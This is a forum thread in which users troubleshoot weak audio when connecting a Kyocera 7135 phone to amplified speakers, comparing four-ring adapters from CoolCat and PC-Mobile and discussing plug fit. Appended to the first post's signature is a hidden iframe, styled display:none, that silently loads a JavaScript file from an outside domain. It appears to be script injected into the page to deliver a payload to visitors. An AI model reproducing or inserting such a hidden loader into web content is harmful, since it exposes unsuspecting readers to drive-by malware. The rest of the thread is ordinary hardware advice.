+ Reply to Thread

Bebopper....EXTERNAL SPEAKER ??

I ahve purchase Bebopper (great program) BUT it will not play when I hook an external speaker up to my Kyocera 7135 (small plug into a bigger one)...Any reason why?

I can hear it...but barely. There is nothing wrong with the speaker.

Any suggestions would be appreciated.

Thanks.

wxman<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I assume you mean you are using an adaptor; is it one of CoolCat's or from another source such as Radio Shack? Adaptors not specifically designed for this device will not work as desired, even if the size conversion is correct. Secondly, are you plugging into amplified speakers? I am assuming the 7135 puts out a line level source, in which case you would hear next to nothing if your speakers were not amplified.

Just a couple possibilities off the top of my head.
    ----------------------------------
    http://www.mistercrazy.com/

Yea....and thanks.

I am using an adapter from Radio Shack that fits it. I guess that's why I get no sound! Where can I get an adapter that would work? Like "Coolcats" that you talk about? I am unfamiliar with this and will NOT hesitate to get one.

And yes..it is going into an amplified speaker. Strange thing, though, I have tried this before with another type of adapter (Can't remember what type off hand) and it worked.

Please fill my in about an adapter I can purchase.

Thanks for the information. I do appreciate it.

wxman

Cocked, Locked & Loaded RedDog205's Avatar
    Get the one from PC-Mobile then u can connect it to your amplified PC type speakers using a standard 3.5mm stereo (standard walkman type headphone plug) to 3.5mm stereo cable or use a 3.5mm to dual RCA cable to connect to your home stereo CD input connection. It's cheap and it works!

PC-Mobile link
    Nothing is idiot proof. There's always a smarter Idiot.
    http://www.danasoft.com/sig/reddog205.jpg

It is the one that has a model number of KY7AA isn't it?

I just want to make sure I get the right one from Pc-Mobile. I'm a little confused on what exactly their advertising their.

Thanks, again, for the help.

wxman

Cocked, Locked & Loaded RedDog205's Avatar
    Yes wxman, this is the KY7AA. The link I posted will take you right to it. It does the same thing the Kyocera stereo HF headset does but it gives you the advantage of using the headphones of your choice since it has the standard 3.5mm stereo jack. The mic and hangup/answer button are built into the pod with the jack and it has a volume control. It is just what the doctor ordered.

http://www.pc-mobile.net/ky7135.htm
    Nothing is idiot proof. There's always a smarter Idiot.
    http://www.danasoft.com/sig/reddog205.jpg

Red Dog.

I guess the only thing I really needed was the KY35A adapter. The ONLY thing I want to do is TO LISTEN TO MUSIC ON AN EXTERNAL, AMPLIFIED, SPEAKER.

I believe THIS is the adapter I need. Just something, that will work, to plug into the kyocera 7135 and out to a speaker to listen to a few mp3 files from Bebopper.

Thanks for your help. Why aren't THESE adapters available locally? Any idea?

wxman

How many Rings are on the plug for the speaker? You will notice that most plugs have 2-3. On the Kyocera ther are 4. This allows for it to be used as a input/ output on there propritory system (therefore you can speak and hear) Adapters from RS will useally only have 3 rings unless you ask for a speciallity item

Sorry, should have posted link with original post:

You can order the adaptor you need from here: http://www.geocities.com/nokmout/adapter.html

CoolCat is a regular poster to the forum and has been offering these adaptors since just after the phone was released. I would recommend them, as I have been using one with no problems for a few months now. The one from PC-mobile looks fine too, though I can't speak from firsthand experience.
    ----------------------------------
    http://www.mistercrazy.com/

Coot Cats seems to be a nice adapter, but who's got 2 months on back order to possibly wait for this?

I'll take my chances and order from the other.

Thanks for the insight.

wxman

PC Mobile Adapter

I order the PC mobile adapter and have been very happy with the product. I did not want to wait two months for Cool Cat, but I was a little worried that the PC-mobile was being shipped from Honk Kong. However, they delivered it around a week after my order.

Thanks, man, I appreciate the response. I've gone ahead and ordered it and am looking forward to getting the item.

THey sent me a confirmation, so it must be legitamit (spelling?).

wxman

Re: PC Mobile Adapter

Originally posted by uofmtiger
    I order the PC mobile adapter and have been very happy with the product. I did not want to wait two months for Cool Cat, but I was a little worried that the PC-mobile was being shipped from Honk Kong. However, they delivered it around a week after my order.
    I don't get quite the volume I wish I did when I connect external headphones or speakers, but with powered speakers I can get it pretty loud. Just fyi.

PC-Mobile

I have received the adapter from PC-Mobile from Hong Kong and it ONLY took 4 days to get here to Dallas, Texas.

Not REAL satisified with it. Yes, it works, but when you PLUG IT IN ALL THE WAY, the sound is NOT as loud as if you 'partially' put it in. But putting it in partially does not stay....YOU HAVE TO HOLD IT !!

Yes, it works all the way in........but it sounds better and louder when its just 'partially put in' around 3/4 of the way. But, again, it doesn't stay like this because you have to hold it...what a pain.

Suggestions?

Thanks.

wxman

Re: PC-Mobile

Originally posted by wxman
    but it sounds better and louder when its just 'partially put in' around 3/4 of the way. But, again, it doesn't stay like this because you have to hold it...what a pain.

Suggestions?

Why not try a small rubber o-ring or small rubber-band, maybe a orthodontic rubber-band.
    Billman
    Colorado

Did I say that, or just think it?

Yes, it works all the way in........but it sounds better and louder when its just 'partially put in' around 3/4 of the way. But, again, it doesn't stay like this because you have to hold it...what a pain.
    I think your problem is related to the Kyocera 7135, not the adapter. When I plug my headphones into my laptop, I get this same problem (it sounds better pulled abut 1/3 out). However, I can plug the same headphones (all the way in) into any other device and they work fine. This would lead me to believe that this kind of problem is actually related to the plug on the phone.